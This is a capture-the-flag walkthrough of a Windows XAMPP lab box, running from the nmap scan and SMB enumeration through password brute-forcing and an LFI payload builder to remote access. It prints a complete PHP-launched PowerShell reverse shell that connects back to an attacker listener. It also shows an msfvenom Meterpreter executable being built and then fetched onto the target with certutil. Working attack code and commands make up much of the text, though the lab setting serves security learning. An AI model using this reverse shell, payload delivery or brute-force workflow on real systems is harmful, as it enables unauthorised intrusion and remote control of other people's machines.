Nmap #
[root@Hacking] /home/kali/Patata
❯ nmap 192.168.26.11 -A
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Curiosidades CTF
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Curiosidades CTF
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
MAC Address: 08:00:27:3D:D6:CB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows 10
OS CPE: cpe:/o:microsoft:windows_10
OS details: Microsoft Windows 10 1709 - 21H2
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-08-30T07:16:27
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: PATATA-MAGICA, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:3d:d6:cb (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
TRACEROUTE
HOP RTT ADDRESS
1 0.22 ms 192.168.26.11
File Read #
On port 80 there is a Games page (juegos.php) that loads its content through a file parameter:
http://192.168.26.11/juegos.php?file=index.php
A special secret can be found there: the SMB credentials patata / 00000, which NetExec confirms:
[root@Hacking] /home/kali/Patata
❯ NetExec smb 192.168.26.11 -u patata -p 00000
SMB 192.168.26.11 445 PATATA-MAGICA [*] Windows 10 / Server 2019 Build 19041 x64 (name:PATATA-MAGICA) (domain:Patata-Magica) (signing:False) (SMBv1:False)
SMB 192.168.26.11 445 PATATA-MAGICA [+] Patata-Magica\patata:00000
SMB #
[root@Hacking] /home/kali/Patata
❯ smbmap -H 192.168.26.11 -u patata -p 00000
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.26.11:445 Name: 192.168.26.11 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Admin remota
C$ NO ACCESS Recurso predeterminado
Figuras NO ACCESS Espero alcanzarlos algun dia
IPC$ READ ONLY IPC remota
Secreto READ ONLY jejejeje
[*] Closed 1 connections
The Secreto share is readable; download what it holds:
[root@Hacking] /home/kali/Patata
❯ smbclient //192.168.26.11/Secreto -U patata
Password for [WORKGROUP\patata]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Aug 24 14:10:31 2025
.. D 0 Sun Aug 24 14:10:31 2025
Banderas.txt A 275 Sun Aug 24 14:10:09 2025
12959816 blocks of size 4096. 5967306 blocks available
smb: \> get Banderas.txt
getting file \Banderas.txt of size 275 as Banderas.txt (89.5 KiloBytes/sec) (average 89.5 KiloBytes/sec)
smb: \> exit
Read the file:
[root@Hacking] /home/kali/Patata
❯ cat Banderas.txt
===========================================================
bandera de usuario: dmVyZGFkIHF1ZSB0ZSBlbmdhbmU/
===========================================================
bandera de admin: ZXN0YSB0YW1wb2NvIGVzLi4u
===========================================================
Both look like flags but base64-decode to taunts: "verdad que te engane?" ("did I really fool you?") and "esta tampoco es..." ("this one isn't it either..."). They are decoys.
[root@Hacking] /home/kali/Patata
❯ echo dmVyZGFkIHF1ZSB0ZSBlbmdhbmU/ | base64 -d
verdad que te engane?
[root@Hacking] /home/kali/Patata
❯ echo ZXN0YSB0YW1wb2NvIGVzLi4u | base64 -d
esta tampoco es...
User Enum #
[root@Hacking] /home/kali/Patata
❯ NetExec smb 192.168.26.11 -u patata -p 00000 --rid-brute | grep SidTypeUser
SMB 192.168.26.11 445 PATATA-MAGICA 500: PATATA-MAGICA\Administrador (SidTypeUser)
SMB 192.168.26.11 445 PATATA-MAGICA 501: PATATA-MAGICA\Invitado (SidTypeUser)
SMB 192.168.26.11 445 PATATA-MAGICA 503: PATATA-MAGICA\DefaultAccount (SidTypeUser)
SMB 192.168.26.11 445 PATATA-MAGICA 504: PATATA-MAGICA\WDAGUtilityAccount (SidTypeUser)
SMB 192.168.26.11 445 PATATA-MAGICA 1002: PATATA-MAGICA\www-data (SidTypeUser)
SMB 192.168.26.11 445 PATATA-MAGICA 1003: PATATA-MAGICA\Hacker (SidTypeUser)
SMB 192.168.26.11 445 PATATA-MAGICA 1004: PATATA-MAGICA\patata (SidTypeUser)
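What --rid-brute does, and how to read its output, as an added example that is not part of the original writeup: NetExec takes the machine SID, appends candidate RIDs, and asks the LSA to resolve each one with LookupSids; whatever resolves is an account. The code parses the listing above (reproduced as a constructed string, with one extra SidTypeGroup line added here to show why the SidType filter matters), separates well-known built-in accounts from locally created ones, and cross-checks the www-data SID that whoami prints later in the writeup. The RID range defaults are assumptions.

```python
import re
from typing import List, Optional, Tuple

# Constructed copy of the NetExec --rid-brute output above, plus one group
# line (RID 513) that the writeup's grep filtered out, added to show the filter.
RID_BRUTE_OUTPUT = r"""
SMB 192.168.26.11 445 PATATA-MAGICA 500: PATATA-MAGICA\Administrador (SidTypeUser)
SMB 192.168.26.11 445 PATATA-MAGICA 501: PATATA-MAGICA\Invitado (SidTypeUser)
SMB 192.168.26.11 445 PATATA-MAGICA 503: PATATA-MAGICA\DefaultAccount (SidTypeUser)
SMB 192.168.26.11 445 PATATA-MAGICA 504: PATATA-MAGICA\WDAGUtilityAccount (SidTypeUser)
SMB 192.168.26.11 445 PATATA-MAGICA 513: PATATA-MAGICA\None (SidTypeGroup)
SMB 192.168.26.11 445 PATATA-MAGICA 1002: PATATA-MAGICA\www-data (SidTypeUser)
SMB 192.168.26.11 445 PATATA-MAGICA 1003: PATATA-MAGICA\Hacker (SidTypeUser)
SMB 192.168.26.11 445 PATATA-MAGICA 1004: PATATA-MAGICA\patata (SidTypeUser)
"""

# SID of the www-data account as reported by `whoami /all` later in the writeup.
WWW_DATA_SID = "S-1-5-21-2334922310-1485633714-2262252786-1002"

# "<rid>: <domain>\<name> (<SidType>)"
RID_LINE = re.compile(r"(\d+): ([^\\\s]+)\\(\S+) \((SidType\w+)\)")


def parse_rid_brute(text: str) -> List[Tuple[int, str, str]]:
    """(rid, account, sid_type) for every resolved RID in NetExec output."""
    return [(int(rid), name, kind) for rid, _domain, name, kind in RID_LINE.findall(text)]


def split_sid(sid: str) -> Tuple[str, int]:
    """'S-1-5-21-A-B-C-1002' -> ('S-1-5-21-A-B-C', 1002)."""
    base, _, rid = sid.rpartition("-")
    return base, int(rid)


def candidate_sids(domain_sid: str, start: int = 500, stop: int = 1100) -> List[str]:
    """What --rid-brute does under the hood: append each RID to the machine SID
    and resolve it with LsarLookupSids; RIDs that resolve are real accounts.
    The range is an assumption; NetExec's own default differs."""
    return [f"{domain_sid}-{rid}" for rid in range(start, stop)]


def user_accounts(entries, include_builtin: bool = False) -> List[str]:
    """Names worth brute-forcing: SidTypeUser entries with RID >= 1000, i.e. locally
    created accounts. RIDs below 1000 are well-known built-ins: 500 Administrator,
    501 Guest, 503 DefaultAccount, 504 WDAGUtilityAccount (the last two disabled by default)."""
    return [name for rid, name, kind in entries
            if kind == "SidTypeUser" and (include_builtin or rid >= 1000)]


def account_for_sid(entries, sid: str) -> Optional[str]:
    """Cross-check: map a full SID seen on the host back to the enumerated name."""
    _, rid = split_sid(sid)
    for r, name, _kind in entries:
        if r == rid:
            return name
    return None


if __name__ == "__main__":
    entries = parse_rid_brute(RID_BRUTE_OUTPUT)
    print("targets:", user_accounts(entries))
    print("www-data SID resolves to:", account_for_sid(entries, WWW_DATA_SID))
    domain_sid, _ = split_sid(WWW_DATA_SID)
    print("first candidates:", candidate_sids(domain_sid, 500, 503))
```

The machine SID prefix S-1-5-21-2334922310-1485633714-2262252786 is the same for every local account; only the trailing RID differs, which is why a single authenticated session is enough to walk the whole account list.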
Brute Password #
Brute-force the Hacker account's password with rockyou (--ignore-pw-decoding skips wordlist lines that are not valid UTF-8 instead of aborting). Hammering a single account like this assumes there is no lockout policy; on a real host check net accounts first. The hit is hacker:clifford, and that account gets a different share mapping:
NetExec smb 192.168.26.11 -u Hacker -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
[root@Hacking] /home/kali/Patata
❯ smbmap -H 192.168.26.11 -u hacker -p clifford
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.26.11:445 Name: 192.168.26.11 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Admin remota
C$ NO ACCESS Recurso predeterminado
Figuras READ ONLY Espero alcanzarlos algun dia
IPC$ READ ONLY IPC remota
Secreto NO ACCESS jejejeje
[*] Closed 1 connections
Figuras is readable for this account and holds three images; grab them all:
[root@Hacking] /home/kali/Patata
❯ smbclient //192.168.26.11/Figuras -U hacker
Password for [WORKGROUP\hacker]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Aug 24 15:55:12 2025
.. D 0 Sun Aug 24 15:55:12 2025
Astro.jpg A 15379 Sun Aug 24 15:55:13 2025
Esevka.jpg A 50675 Sun Aug 24 15:54:36 2025
Logo.png A 116897 Sun Aug 24 15:53:26 2025
12959816 blocks of size 4096. 7490350 blocks available
smb: \> mget *
Get file Astro.jpg? y
getting file \Astro.jpg of size 15379 as Astro.jpg (78.6 KiloBytes/sec) (average 78.6 KiloBytes/sec)
Get file Esevka.jpg? y
getting file \Esevka.jpg of size 50675 as Esevka.jpg (437.9 KiloBytes/sec) (average 212.2 KiloBytes/sec)
Get file Logo.png? y
getting file \Logo.png of size 116897 as Logo.png (14269.5 KiloBytes/sec) (average 572.6 KiloBytes/sec)
smb: \> exit
LFI #
Out of ideas at this point. There was an uploads directory earlier, and the source of its 403 page carries a hint:
[root@Hacking] /home/kali/Patata
❯ curl 'http://192.168.26.11/uploads/'
<!DOCTYPE html>
<html>
<head>
<title>403 Forbidden</title>
</head>
<body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<!--
Tal vez aqui este oculto algo... prueba LFI para verlo
-->
</body>
</html>
The comment translates to "Maybe something is hidden here... try LFI to see it."
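The hint points at local file inclusion, and juegos.php already takes a file parameter (juegos.php?file=index.php). The script below is an added example, not part of the original writeup: it builds a php://filter payload that makes include() return the target file base64-encoded instead of executing it, so PHP source such as juegos.php or subida.php can be read through the LFI, and it pulls the encoded blob back out of the surrounding HTML. It assumes juegos.php passes file straight to include()/require(); the writeup only shows the parameter and the hint, not a confirmed read, and the sample response is constructed.

```python
import base64
import re
from typing import Optional
from urllib.parse import parse_qs, urlencode, urlparse

# Assumption: juegos.php does include($_GET['file']) or equivalent.
TARGET = "http://192.168.26.11/juegos.php"
PARAM = "file"

# Constructed: what a page would look like if the include returned base64 of this source.
CONSTRUCTED_SOURCE = "<?php include($_GET['file']); ?>"
CONSTRUCTED_PAGE = (
    "<html><body><h1>Curiosidades CTF</h1>"
    + base64.b64encode(CONSTRUCTED_SOURCE.encode()).decode()
    + "</body></html>"
)

# A run of base64 long enough not to collide with ordinary page text.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")


def filter_payload(resource: str) -> str:
    """php://filter wrapper: include() emits the file base64-encoded rather than
    executing it, which is what makes .php source readable through an LFI."""
    return f"php://filter/convert.base64-encode/resource={resource}"


def traversal_payload(path: str, depth: int = 6) -> str:
    """Plain traversal for non-PHP files (e.g. Windows/win.ini on this XAMPP box);
    extra '..' segments are harmless once the drive root is reached."""
    return "../" * depth + path


def build_url(base: str, param: str, payload: str) -> str:
    """URL-encode the payload so ':' and '/' survive the query string."""
    return f"{base}?{urlencode({param: payload})}"


def query_param(url: str, param: str) -> str:
    """Decode a query parameter back out of a built URL (used for checking)."""
    return parse_qs(urlparse(url).query)[param][0]


def extract_source(html: str) -> Optional[str]:
    """The encoded file is emitted inline in the page; take the longest base64
    run and decode it. None when nothing in the response decodes."""
    runs = B64_RUN.findall(html)
    if not runs:
        return None
    blob = max(runs, key=len)
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError: not real base64
        return None


def fetch_source(resource: str, timeout: float = 10) -> Optional[str]:
    """Live request against the target (not exercised in the offline demo)."""
    import urllib.request
    url = build_url(TARGET, PARAM, filter_payload(resource))
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return extract_source(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    print(build_url(TARGET, PARAM, filter_payload("juegos.php")))
    print(build_url(TARGET, PARAM, traversal_payload("Windows/win.ini")))
    print(extract_source(CONSTRUCTED_PAGE))
```

Run it with no arguments to see the payload URLs and the decode of the constructed page; fetch_source() performs the live request. The wrapper avoids the usual problem with LFI on PHP files: a plain ?file=subida.php executes the script instead of showing it.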
Enumerate the web root with feroxbuster (the common-and-spanish wordlist suits a Spanish-language site):
[root@Hacking] /home/kali/Patata
❯ feroxbuster -u 'http://192.168.26.11/' -w /usr/share/seclists/Discovery/Web-Content/common-and-spanish.txt -x php
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.26.11/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/common-and-spanish.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 33w 299c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 30w 302c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 225l 581w 7539c http://192.168.26.11/juegos.php
200 GET 99l 380w 4241c http://192.168.26.11/index.php
200 GET 69l 395w 3596c http://192.168.26.11/articulos.php
200 GET 99l 380w 4241c http://192.168.26.11/
200 GET 652l 4314w 361553c http://192.168.26.11/favicon.ico
200 GET 99l 380w 4241c http://192.168.26.11/Index.php
403 GET 11l 47w 421c http://192.168.26.11/licenses
200 GET 15l 83w 560c http://192.168.26.11/ajedrez_medieval.txt
200 GET 13l 63w 482c http://192.168.26.11/videojuegos.txt
200 GET 11l 84w 544c http://192.168.26.11/senet.txt
403 GET 11l 47w 421c http://192.168.26.11/phpmyadmin
200 GET 15l 65w 446c http://192.168.26.11/naipes.txt
200 GET 3l 36w 223c http://192.168.26.11/robots.txt
403 GET 11l 47w 421c http://192.168.26.11/server-info
403 GET 11l 47w 421c http://192.168.26.11/server-status
200 GET 58l 245w 3255c http://192.168.26.11/subida.php
301 GET 9l 30w 340c http://192.168.26.11/uploads => http://192.168.26.11/uploads/
503 GET 11l 44w 402c http://192.168.26.11/examples
200 GET 14l 31w 277c http://192.168.26.11/uploads/index.html
[####################] - 9s 14973/14973 0s found:19 errors:0
[####################] - 4s 4987/4987 1218/s http://192.168.26.11/
[####################] - 8s 4987/4987 631/s http://192.168.26.11/cgi-bin/
[####################] - 6s 4987/4987 849/s http://192.168.26.11/uploads/
Among the results, subida.php (Spanish for "upload") is reachable and accepts file uploads. The PHP file uploaded through it:
<?php
set_time_limit(0);
// Listener IP and port come from the query string (defaults if absent)
$ip   = isset($_GET['ip']) ? $_GET['ip'] : '192.168.101.4';
$port = isset($_GET['port']) ? (int)$_GET['port'] : 5000;
// Validate both before they are interpolated into the PowerShell script
if (!filter_var($ip, FILTER_VALIDATE_IP)) {
    die("Invalid IP: " . htmlspecialchars($ip));
}
if ($port < 1 || $port > 65535) {
    die("Invalid port: " . htmlspecialchars($port));
}
// PowerShell TCP reverse shell: read a command, run it with iex, send back the
// output plus a prompt. ASCIIEncoding means any non-ASCII output (accented
// Spanish text from localized Windows tools) comes back as '?'.
$psScript = "
\$client = New-Object System.Net.Sockets.TCPClient('$ip',$port)
\$stream = \$client.GetStream()
[byte[]]\$bytes = 0..65535|%{0}
while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){
    \$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0,\$i)
    \$sendback = (iex \$data 2>&1 | Out-String)
    \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> '
    \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2)
    \$stream.Write(\$sendbyte,0,\$sendbyte.Length)
    \$stream.Flush()
}
\$client.Close()
";
// Write it to a temp file. powershell -File needs the .ps1 extension, and
// tempnam() has already created the extension-less file, so rename it rather
// than leaving an empty ps_XXXX.tmp behind on disk.
$tmp      = tempnam(sys_get_temp_dir(), 'ps_');
$tempFile = $tmp . '.ps1';
rename($tmp, $tempFile);
file_put_contents($tempFile, $psScript);
// Run it; shell_exec blocks for as long as the shell stays connected
$command = "powershell.exe -ExecutionPolicy Bypass -File \"$tempFile\"";
$output = shell_exec($command . " 2>&1");
// Remove the script once the shell closes
unlink($tempFile);
echo "Reverse shell launched towards $ip:$port. Check your listener.";
?>
It is a reverse shell: PHP writes a PowerShell TCP client to a temp file and executes it, with the listener IP and port taken from the query string. With a listener on 4444, trigger the uploaded file:
http://192.168.26.11/uploads/revershell.php?ip=192.168.26.3&port=4444
MSF #
Check identity and privileges from the shell:
PS C:\xampp> whoami /all
INFORMACIÓN DE USUARIO
----------------------
Nombre de usuario SID
====================== ==============================================
patata-magica\www-data S-1-5-21-2334922310-1485633714-2262252786-1002
INFORMACIÓN DE GRUPO
--------------------
Nombre de grupo Tipo SID Atributos
=========================================== ============== ============ ========================================================================
Todos Grupo conocido S-1-1-0 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Usuarios Alias S-1-5-32-545 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\BATCH Grupo conocido S-1-5-3 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
INICIO DE SESIÓN EN LA CONSOLA Grupo conocido S-1-2-1 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Usuarios autentificados Grupo conocido S-1-5-11 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Esta compañía Grupo conocido S-1-5-15 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Cuenta local Grupo conocido S-1-5-113 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
LOCAL Grupo conocido S-1-2-0 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Autenticación NTLM Grupo conocido S-1-5-64-10 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
Etiqueta obligatoria\Nivel obligatorio alto Etiqueta S-1-16-12288
INFORMACIÓN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripción Estado
============================= ============================================ =============
SeShutdownPrivilege Apagar el sistema Deshabilitado
SeChangeNotifyPrivilege Omitir comprobación de recorrido Habilitada
SeUndockPrivilege Quitar equipo de la estación de acoplamiento Deshabilitado
SeImpersonatePrivilege Suplantar a un cliente tras la autenticación Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Deshabilitado
SeTimeZonePrivilege Cambiar la zona horaria Deshabilitado
SeImpersonatePrivilege is present and enabled. That is the precondition for the Potato family of token-impersonation escalations (JuicyPotato, PrintSpoofer, GodPotato and Metasploit's getsystem all rely on it), so rather than doing it by hand, go straight to msf: drop a Meterpreter payload and escalate from there.
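A quick triage of whoami /all output, as an added example that is not part of the original writeup. It parses the privilege table (reproduced below as a constructed string, Spanish locale, same values as above) by privilege name, because the names are identical in every Windows locale while the description and state columns are translated, and reports which held privileges are a known route to SYSTEM. The lists of dangerous privileges and the integrity-level mapping are my own selection, not from the page.

```python
import re
from typing import Dict, List, Optional

# Constructed copy of the integrity label and privilege block from the
# `whoami /all` output above (Spanish locale).
WHOAMI_OUTPUT = r"""
Etiqueta obligatoria\Nivel obligatorio alto Etiqueta S-1-16-12288
INFORMACIÓN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripción Estado
============================= ============================================ =============
SeShutdownPrivilege Apagar el sistema Deshabilitado
SeChangeNotifyPrivilege Omitir comprobación de recorrido Habilitada
SeUndockPrivilege Quitar equipo de la estación de acoplamiento Deshabilitado
SeImpersonatePrivilege Suplantar a un cliente tras la autenticación Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Deshabilitado
SeTimeZonePrivilege Cambiar la zona horaria Deshabilitado
"""

# Potato family / PrintSpoofer: coerce a SYSTEM connection and impersonate it.
TOKEN_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}
# Other well-known stand-alone paths to SYSTEM (selection is mine).
OTHER_PRIVS = {
    "SeDebugPrivilege", "SeBackupPrivilege", "SeRestorePrivilege",
    "SeTakeOwnershipPrivilege", "SeLoadDriverPrivilege",
}

# Mandatory label RIDs (SECURITY_MANDATORY_*_RID).
INTEGRITY = {4096: "Low", 8192: "Medium", 12288: "High", 16384: "System"}

# Name, then a localized description, then a single-word localized state.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(\S+)\s*$", re.MULTILINE)


def parse_privileges(text: str) -> Dict[str, str]:
    """Map privilege name -> state string exactly as printed (localized)."""
    return {name: state for name, _desc, state in PRIV_LINE.findall(text)}


def escalation_candidates(privs: Dict[str, str]) -> List[str]:
    """Held privileges that are a known path to SYSTEM. The state column is
    ignored on purpose: a privilege listed as disabled is still in the token and
    the process can enable it with AdjustTokenPrivileges; only absence matters."""
    return sorted(p for p in privs if p in TOKEN_PRIVS | OTHER_PRIVS)


def potato_ready(privs: Dict[str, str]) -> bool:
    """True when a token-impersonation privilege is held."""
    return any(p in privs for p in TOKEN_PRIVS)


def integrity_level(text: str) -> Optional[str]:
    """Mandatory label S-1-16-<rid>; 12288 is High, which is what this shell runs at."""
    m = re.search(r"S-1-16-(\d+)", text)
    return INTEGRITY.get(int(m.group(1))) if m else None


if __name__ == "__main__":
    privs = parse_privileges(WHOAMI_OUTPUT)
    print("integrity:", integrity_level(WHOAMI_OUTPUT))
    print("held privileges:", sorted(privs))
    print("escalation candidates:", escalation_candidates(privs))
    print("Potato-style escalation possible:", potato_ready(privs))
```

Matching on the name rather than on an "Enabled" string is what keeps this working against a Spanish (or any other) console; the same output in English would parse identically.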
[root@Hacking] /home/kali/Patata
❯ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.26.3 LPORT=4444 -f exe -o evil.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: evil.exe
[root@Hacking] /home/kali/Patata
❯ pyhttp 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.26.11 - - [30/Aug/2025 21:06:08] "GET /evil.exe HTTP/1.1" 200 -
192.168.26.11 - - [30/Aug/2025 21:06:08] "GET /evil.exe HTTP/1.1" 200 -
On the target, fetch and launch it:
PS C:\temp> certutil -f -split -urlcache http://192.168.26.3/evil.exe
**** En línea ****
0000 ...
1c00
CertUtil: -URLCache comando completado correctamente.
PS C:\temp> .\evil.exe
Then attempt the privilege escalation directly.